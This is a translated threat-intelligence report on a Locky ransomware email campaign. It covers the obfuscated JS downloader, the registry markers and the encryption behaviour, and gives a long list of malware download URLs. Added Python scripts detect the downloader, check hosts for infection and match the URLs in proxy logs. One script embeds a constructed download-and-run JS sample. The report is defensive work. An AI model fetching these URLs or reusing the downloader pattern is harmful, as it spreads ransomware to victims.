Overview
Since February, 360 Threat Intelligence Center has been monitoring a large wave of ransomware. Domestic organizations have begun to be hit one after another, and companies' external-facing mailboxes have received large numbers of emails carrying malicious attachments like the one below.
The email content is roughly as follows:
If an employee carelessly opens the malicious attachment, the malware connects out to a server to download its components, encrypts important files on the system, and demands that the user pay for decryption.
Sample behavior analysis
The email attachment is an archive containing only two JS scripts:
The JS is obfuscated. Analysis shows that once the victim double-clicks the JS, it creates an MSXML2.XMLHTTP object to download the executable from http:///euwiyr4hdc, and then launches the Locky main process through the run method of a WScript.Shell object:
The downloaded exe is heavily obfuscated:
After the process starts, it writes the machine ID to HKEY_CURRENT_USER\Software\Locky\id and writes the public key used for encryption to HKEY_CURRENT_USER\Software\Locky\pubkey:
The trojan then traverses directories looking for files in formats such as .xls, .ppt, .doc, .wb2, .jpg and .wav, encrypts them with RSA into files named Id+hash.locky, and writes a recovery instruction document into every directory that contains documents:
After encryption completes, it sets HKEY_CURRENT_USER\Software\Locky\completed to 1 and reports to the server with encrypted data:
Below is a partial list of communication addresses:
Finally it sets the desktop wallpaper to the recovery instruction image, pops up the recovery instruction document, and waits for the victim to pay the ransom:
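The downloader behaviour just described (MSXML2.XMLHTTP download, then WScript.Shell.run) can be triaged statically on the mail gateway or in the SOC before anyone double-clicks. The script below is an added example, not code from the original report: it normalizes two cheap obfuscation tricks (split string literals and String.fromCharCode) and then scores the attachment on the indicators the report names. SAMPLE_JS is a constructed script imitating the pattern, and its host is a placeholder because the report's own URL has the host stripped.

```python
"""Static triage of a JS e-mail attachment for the downloader pattern the
report describes: an MSXML2.XMLHTTP download followed by WScript.Shell.run.
This is an added example, not code from the original report; SAMPLE_JS is a
constructed script that imitates the pattern, not the real attachment."""
import re

# Indicators drawn from the behaviour described in the report, plus
# ActiveXObject, which is how JScript instantiates those COM objects.
INDICATORS = {
    "xmlhttp": re.compile(r"MSXML2\.XMLHTTP", re.I),
    "wshell":  re.compile(r"WScript\.Shell", re.I),
    "run":     re.compile(r"\.run\s*\(", re.I),
    "activex": re.compile(r"new\s+ActiveXObject\s*\(", re.I),
    "url":     re.compile(r"https?://", re.I),
}
DOWNLOADER_SET = {"xmlhttp", "wshell", "run"}


def _decode_charcodes(match):
    """Rebuild a literal from a String.fromCharCode(87,83,...) argument list."""
    codes = [int(c) for c in match.group(1).split(",") if c.strip()]
    return '"' + "".join(chr(c) for c in codes) + '"'


def normalize(script):
    """Undo two cheap obfuscation tricks so the indicators become visible:
    String.fromCharCode(...) literals and split-string concatenation
    ("MSX" + "ML2"). Decode first, then join, so decoded pieces also merge."""
    s = re.sub(r"String\.fromCharCode\(\s*([\d,\s]+)\)", _decode_charcodes, script)
    s = re.sub(r'"\s*\+\s*"', "", s)
    s = re.sub(r"'\s*\+\s*'", "", s)
    return s


def extract_urls(script):
    """Collect URL literals from the (normalized) script text."""
    return sorted(set(re.findall(r"https?://[^\s\"'()]+", script)))


def triage(script):
    """Return indicator hits, embedded URLs and a verdict for one script."""
    s = normalize(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(s)]
    verdict = "downloader-like" if DOWNLOADER_SET <= set(hits) else "inconclusive"
    return {"hits": hits, "urls": extract_urls(s), "verdict": verdict}


# Constructed sample; the host is a placeholder because the report's real
# host is not given (its URL appears as http:///euwiyr4hdc).
SAMPLE_JS = r'''
var a = new ActiveXObject("MSX" + "ML2.XML" + "HTTP");
a.open("GET", "http://placeholder.invalid/euwiyr4hdc", false);
a.send();
var sh = new ActiveXObject(String.fromCharCode(87,83,99,114,105,112,116) + ".Shell");
sh.run("%TEMP%\\payload.exe");
'''

if __name__ == "__main__":
    print(triage(SAMPLE_JS))
```

Scoring on the three-indicator set rather than on any single string keeps false positives down on ordinary admin scripts that also use WScript.Shell; the extracted URLs are what you would feed into the boundary blocklist.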
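The registry values and the .locky renaming described in the steps above give an incident responder a quick way to tell whether a host was touched and whether encryption ran to completion. The check below is an added example, not code from the original report: the Windows-only reader uses winreg for HKCU\Software\Locky, while the assessment takes plain dicts and file-name lists so it can be exercised off-Windows. The file-name pattern is an assumption (the report only says "Id+hash.locky"), and the registry data and file names are constructed.

```python
"""Host-side check for the infection markers the report describes:
the HKCU\\Software\\Locky values id, pubkey and completed, and files renamed
to <Id+hash>.locky. This is an added example, not code from the original
report. The registry is read through a small Windows-only reader (winreg)
and the assessment logic takes plain dicts/lists, so it also runs elsewhere."""
import os
import re
import sys

LOCKY_KEY = r"Software\Locky"          # under HKEY_CURRENT_USER, per the report
LOCKY_VALUES = ("id", "pubkey", "completed")
# Assumption: the report only says "Id+hash.locky"; the pattern accepts any
# hexadecimal stem of at least 16 characters before the extension.
LOCKY_NAME = re.compile(r"^[0-9A-Fa-f]{16,}\.locky$")


def read_locky_values_winreg():
    """Windows-only: return {value_name: data} for HKCU\\Software\\Locky,
    or {} when the key is absent."""
    import winreg
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, LOCKY_KEY)
    except OSError:
        return {}
    found = {}
    with key:
        for name in LOCKY_VALUES:
            try:
                found[name] = winreg.QueryValueEx(key, name)[0]
            except OSError:
                pass
    return found


def assess(reg_values, filenames):
    """Combine registry markers and file names into a stage verdict.
    reg_values: {value_name: data}; filenames: base names seen on the host."""
    markers = {name: name in reg_values for name in LOCKY_VALUES}
    completed = str(reg_values.get("completed", "")) == "1"
    locky_files = [f for f in filenames if LOCKY_NAME.match(f)]
    if markers["id"] or markers["pubkey"] or locky_files:
        stage = "encryption finished" if completed else "infection in progress or interrupted"
    else:
        stage = "no Locky markers"
    return {"markers": markers, "completed": completed,
            "locky_files": len(locky_files), "stage": stage}


# Constructed sample data standing in for a real host.
SAMPLE_REG = {"id": "0123456789ABCDEF", "pubkey": b"\x06\x02\x00\x00", "completed": 1}
SAMPLE_FILES = ["0123456789ABCDEF0123456789ABCDEF.locky",
                "FEDCBA9876543210AABBCCDD00112233.locky",
                "budget.xls", "notes.txt"]

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    names = [f for _, _, files in os.walk(root) for f in files]
    reg = read_locky_values_winreg() if sys.platform == "win32" else {}
    print(assess(reg, names))
```

Run it on a suspect host with the directory to walk as the first argument. An id or pubkey value without completed=1 means the process was stopped mid-run, which matters for deciding whether unencrypted files can still be salvaged before the machine is rebuilt.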
Infection situation and recommendations
According to 360 Threat Intelligence Center data, more than ten thousand users have been confirmed infected since March, and services offering to pay the ransom and decrypt on the victim's behalf have even appeared on Taobao. We advise users not to casually click on emails of unknown origin; 360 Safeguard (360安全卫士) is already detecting and removing this ransomware on an ongoing basis.
IOC
The downloader servers the attackers use to host the malicious code are mostly compromised legitimate sites. Below is a partial list; please block them on boundary devices.
http://1./engine/core/76tr5rguinml.exe
http://1./modules/images/87yhb54cdfy.exe
http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B//system/logs/76tr5rguinml.exe
http://120.52.72.52//c3pr90ntcsf0/system/logs/76tr5rguinml.exe
http://120.52.72.57//c3pr90ntcsf0/system/logs/4trf3g45.exe
http://178.33.176.229/ber.exe
http://2./img/multigaminator/4trf3g45.exe
http://50.28.211.199/hdd0/89o8i76u5y4
http://51457642.de./980k7j6h5
http:///wp-includes/rest-api/5h45hg4b
http:///4/0vexw3s5
http:///system/logs/086tg7
http:///87yg756f5.exe
http:///system/logs/98yhb764d.exe
http:///wp-content/plugins/87tg7v645c.exe
http:///87yg756f5.exe
http://anro./vqmod/vqcache/4trf3g45.exe
http:///system/logs/87tg7v645c.exe
http:///system/logs/765uy453gt5
http:///87yg756f5.exe
http:///libraries/simplepie/765g473bf34
http:///wp-includes/SimplePie/7ygvtyvb7niim.exe
http:///08o76g445g
http:///system/logs/87tg7v645c.exe
http:///image/templates/7ygvtyvb7niim.exe
http:///system/logs/7t6f65g.exe
http:///system/logs/87yhb54cdfy.exe
http:///89ok8jhg
http:///system/logs/7ygvtyvb7niim.exe
http://biomir./system/logs/78tgh76.exe
http:///system/logs/76tr5rguinml.exe
http:///system/cache/223
http:///system/logs/7t6f65g.exe
http://c001456.aaa./system/logs/87yg756f5.exe
http://casewerkz./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http://ccac3323.com./0y7bf3r
http:///system/logs/uy78hn654e.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/lkj87h.exe
http:///system/logs/76tr5rguinml.exe
http:///87yg756f5.exe
http:///wp-content/uploads/5h45hg4b
http:///system/logs/lkj87h.exe
http://cyberbuh./97kh65gh5
http://demo./87yg756f5.exe
http://demo./system/logs/87yhb54cdfy.exe
http://demo2./modules/payments/76tr5rguinml.exe
http://demo2./plugins/markitup/4trf3g45.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/76h5gf43wg54
http://donutes./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/87tg7v645c.exe
http:///js/playstation4.exe
http://eiadmeodeda./8fjvimkel1/c987ah8j9ei1.php
http://e-journal./8y74hfb
http:///wp-content/themes/765g473bf34
http:///wp-admin/network/87hg8n54
http:///admin/model/87yhb54cdfy.exe
http://escortbayan./wp-content/plugins/hello123/89h8btyfde445.exe
http:///763fdvf
http://fashion-girl./catalog/controller/87hg8n54
http://fb7707vd./admin/language/4trf3g45.exe
http:///system/logs/87tg7v645c.exe
http://fkaouane./67uh54gb4
http:///87yg756f5.exe
http:///system/logs/87yhb54cdfy.exe
http:///system/logs/7t6f65g.exe
http://g200./system/logs/87yhb54cdfy.exe
http:///32tguynjk
http:///87yg756f5.exe
http:///69.exe
http:///80.exe
http:///69.exe
http:///80.exe
http://gladilki./system/library/a.exe
http:///87yg756f5.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/98yhb764d.exe
http:///69.exe
http:///80.exe
http:///099oj6hg
http:///27h8n
http:///system/logs/76tr5rguinml.exe
http://hkhc-shop./system/logs/87yg7g
http:///69.exe
http:///87yg756f5.exe
http:///system/logs/87jhg44g5
http:///69.exe
http:///80.exe
http:///80.exe
http:///system/logs/76tr5rguinml.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/4trf3g45.exe
http:///system/logs/76tr5rguinml.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/7t6f65g.exe
http:///9uj8n76b5.exe
http://jewellery./system/logs/iu8y7g6b
http:///system/logs/87tg7v645c.exe
http:///69.exe
http:///80.exe
http:///76t2gr345
http://kiddyshop./image/data/87tg7v645c.exe
http:///7r5fyf6
http://kievelectric./art/media/87tg7v645c.exe
http:///87yg756f5.exe
http://kokoko./54g4
http:///system/logs/76tr5rguinml.exe
http://lahmar.choukri.perso./78hg4wg
http:///system/logs/78tgh76.exe
http:///system/logs/uy78hn654e.exe
http:///admin/controller/87yhb54cdfy.exe
http:///9uj8n76b5.exe
http:///system/logs/87tg7v645c.exe
http://liquor1./system/logs/7ygvtyvb7niim.exe
http:///wp-admin/js/765g473bf34
http:///system/logs/98yhb764d.exe
http:///adminka/templ/7ygvtyvb7niim.exe
http://mansolution./system/logs/7ygvtyvb7niim.exe
http:///978yhen2
http://maxbeauty./administrator/manifests/765g473bf34
http:///system/cache/111
http:///system/logs/uy78hn654e.exe
http:///o097jhg4g5
http:///system/logs/98yhb764d.exe
http:///system/logs/43d5f67n8
http:///system/logs/87yhb54cdfy.exe
http://nagrobkipelplin./modules/mod_wrapper/4trf3g45.exe
http:///system/logs/7t6f65g.exe
http:///87yg756f5.exe
http:///system/logs/987i6u5y4t
http:///system/logs/uy78hn654e.exe
http:///0954t4h45
http:///23r35y44y5
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/23f3rf33.exe
http://ohbelleza./system/logs/87yhb54cdfy.exe
http:///69.exe
http:///80.exe
http:///70.exe
http:///70.exe
http:///85.exe
http:///system/logs/uy78hn654e.exe
http:///k7j6h5gf
http:///3/67t54cetvy
http://parturiencies3f9./76t2gr345
http://perfumy_alice.republika.pl/08h867g5
http:///87745g
http:///98h8n23r23
http:///system/logs/98yg7b
http:///system/logs/q32r45g54
http:///image/cache/7ygvtyvb7niim.exe
http:///system/logs/87tg7v645c.exe
http:///~pugmahons/56er5f6g7b
http://realvacantcolony./97adguwod/08h13rfi982y.php
http://regentsanctionbisexual./97adguwod/08h13rfi982y.php
http:///system/logs/lkj87h.exe
http:///wp-includes/theme-compat/765g473bf34
http:///2/87yv5cds
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/43ghy8n
http:///wp-content/plugins/hello123/89h8btyfde445.exe
http:///system/logs/76tr5rguinml.exe
http://sales-teleselling./wp-includes/fonts/5h45hg4b
http:///67j5h5h4
http:///published/PD/87tg7v645c.exe
http:///system/logs/87tg7v645c.exe
http:///system/logs/76tr5rguinml.exe
http://shofukai.web./23rt54y56
http://shop./system/cache/111
http://shopphpmvc./system/logs/lkj87h.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/78tgh76.exe
http:///5/92buyv5
http:///vqmod/xml/76tr5rguinml.exe
http:///i876jh556h
http:///786u5h
http:///wp-admin/includes/i75rg456
http:///system/logs/4trf3g45.exe
http:///73tgbf334
http:///system/logs/uy78hn654e.exe
http:///system/logs/78tgh76.exe
http://srv35613./storage/plugins/76tr5rguinml.exe
http:///43dfg7hy
http:///system/logs/uy78hn654e.exe
http://stopmeagency./9uj8n76b5.exe
http:///78jh5h
http://store./system/logs/78tgh76.exe
http://sub4./system/logs/87tg7v645c.exe
http:///wp-content/plugins/hello123/89h8btyfde445.exe
http:///system/logs/76tr5rguinml.exe
http://surfcash./0o9k7jh55
http:///system/logs/98yt
http:///system/logs/87tg7v645c.exe
http:///admin/images/7ygvtyvb7niim.exe
http:///67j5hg
http:///system/logs/56y4g45gh45h
http:///vqmod/install/7ygvtyvb7niim.exe
http://test./sdideep/87hg8n54
http:///system/logs/87tg7v645c.exe
http:///bestylethai.com/43t3gh4
http:///45tg
http:///system/logs/4trf3g45.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///69.exe
http:///80.exe
http:///system/logs/4trf3g45.exe
http:///vqmod/xml/87yhb54cdfy.exe
http:///system/logs/87yhb54cdfy.exe
http:///system/cache/.../1.exe
http:///43f
http://tradesolutions./8i76
http:///8i67uy4g
http:///v4v5g45hg.exe
http:///image/cache/87yhb54cdfy.exe
http:///system/logs/lkj87h.exe
http:///v4v5g45hg.exe
http://u1847./system/smsgate/7ygvtyvb7niim.exe
http://ubermensch./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http://vfwuc./wp-content/uploads/5h45hg4b
http://vgp3./6/98yh8bb
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///69.exe
http:///80.exe
http://webmail./v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///system/cache/111
http://workplace-communication./wp-includes/pomo/5h45hg4b
http://www./98o7kj56h
http://www./wp-includes/y78hiuok
http://www./wp-content/uploads/y78hiuok
http://www./system/logs/4trf3g45.exe
http://www./files/Fedex/fedex.exe
http://www./09y8j
http://www./templates/atomic/js/111.exe
http://www./files/sample.exe
http://www./98o7kj56h
http://www./9oi654gh3
http://www./9oi654gh3
http://www./873y4g7bf3
http://www./files/10003c.exe
http://www./7643grb
http://www./8y7hybigv
http://www./8y7hybigv
http://www./parallax/piatti/promt.exe
http://www./8i5ju4g34
http://www./8i5ju4g34
http://www./087hg67
http://www./4ggh45yh45
http://www.:20480/4ggh45yh45
http://www./4ggh45yh45
http://www./0k6j6n4h4
http://www./0k6j6n4h4
http://www./system/logs/7ygvtyvb7niim.exe
http://www./system/logs/87tg7v645c.exe
http://www./k8j5h
http://www./system/logs/87tg7v645c.exe
http://www./system/logs/78tgh76.exe
http://www./system/cache/87yhb54cdfy.exe
http://www./0l9k7j6
http://www./wp-content/plugins/hello123/89h8btyfde445.exe
http://www./9oi86j5hg4
http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe
http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe
http:///system/logs/uy78hn654e.exe
http://zarabotoknasayte.zz.mu/7/sh87hg5v4
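Turning the list above into something a boundary device or proxy-log search can use needs a little care: many entries have their hostname stripped (http:///...) and some keep only a truncated label ("www.", "1."), so they cannot be blocked by host. The script below is an added example, not code from the original report. It keeps real hosts (and host:port pairs) as block candidates, keeps every entry's URL path as a weaker indicator, and matches both against proxy log lines. IOC_URLS holds a handful of entries copied from the list; the log lines are constructed.

```python
"""Turn the downloader URL list above into blockable host indicators and
URL-path indicators, then match them against proxy log lines. This is an
added example, not code from the original report. Many list entries have
their hostname stripped by extraction (http:///...), and some keep only a
truncated label ("www.", "1."); those contribute path indicators only.
IOC_URLS holds a few entries copied from the list; the log lines are constructed."""
import re
from urllib.parse import urlsplit

IOC_URLS = [
    "http://178.33.176.229/ber.exe",
    "http://120.52.72.52//c3pr90ntcsf0/system/logs/76tr5rguinml.exe",
    "http://1./engine/core/76tr5rguinml.exe",
    "http:///system/logs/uy78hn654e.exe",
    "http:///wp-content/plugins/hello123/89h8btyfde445.exe",
]


def _norm_path(path):
    """Collapse repeated slashes so '//c3pr.../x.exe' and '/c3pr.../x.exe' compare equal."""
    return re.sub(r"/{2,}", "/", path)


def parse_iocs(urls):
    """Split the list into (hosts, paths). hosts: 'host' or 'host:port'
    strings safe to block; paths: normalized URL paths for weaker matching."""
    hosts, paths = set(), set()
    for u in urls:
        parts = urlsplit(u.strip())
        # A netloc ending in '.' is a truncated label, not a real host.
        if parts.netloc and not parts.netloc.endswith("."):
            hosts.add(parts.netloc)
        path = _norm_path(parts.path)
        if path and path != "/":
            paths.add(path)
    return hosts, paths


LOG_URL = re.compile(r"https?://\S+")


def match_log_line(line, hosts, paths):
    """Reasons the line matches (empty list if none). A host hit is the strong
    signal; a path-only hit may be a coincidence and is reported for triage."""
    m = LOG_URL.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(0))
    reasons = []
    if parts.netloc in hosts:
        reasons.append("host:" + parts.netloc)
    path = _norm_path(parts.path)
    if path in paths:
        reasons.append("path:" + path)
    return reasons


def scan_log(lines, urls=IOC_URLS):
    """Return [(line, reasons)] for every matching log line."""
    hosts, paths = parse_iocs(urls)
    out = []
    for line in lines:
        reasons = match_log_line(line, hosts, paths)
        if reasons:
            out.append((line, reasons))
    return out


# Constructed proxy log lines (timestamp client method url status).
SAMPLE_LOG = [
    "2016-03-10T09:12:01Z 10.0.0.5 GET http://178.33.176.229/ber.exe 200",
    "2016-03-10T09:12:07Z 10.0.0.9 GET http://shop.example.invalid/system/logs/uy78hn654e.exe 200",
    "2016-03-10T09:12:09Z 10.0.0.9 GET http://www.example.invalid/index.html 200",
]

if __name__ == "__main__":
    for line, reasons in scan_log(SAMPLE_LOG):
        print(reasons, line)
```

Feed the full list above into parse_iocs to get the host set for the blocklist; the path set is best used as a hunting query over historical proxy logs, since the same /system/logs/<name>.exe paths recur across many of the compromised sites.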
This article was originally published by 360安全播报 (360 Security Broadcast); please credit the source and this article's address when reposting. Article address: http://bobao.360.cn/learning/detail/2804.html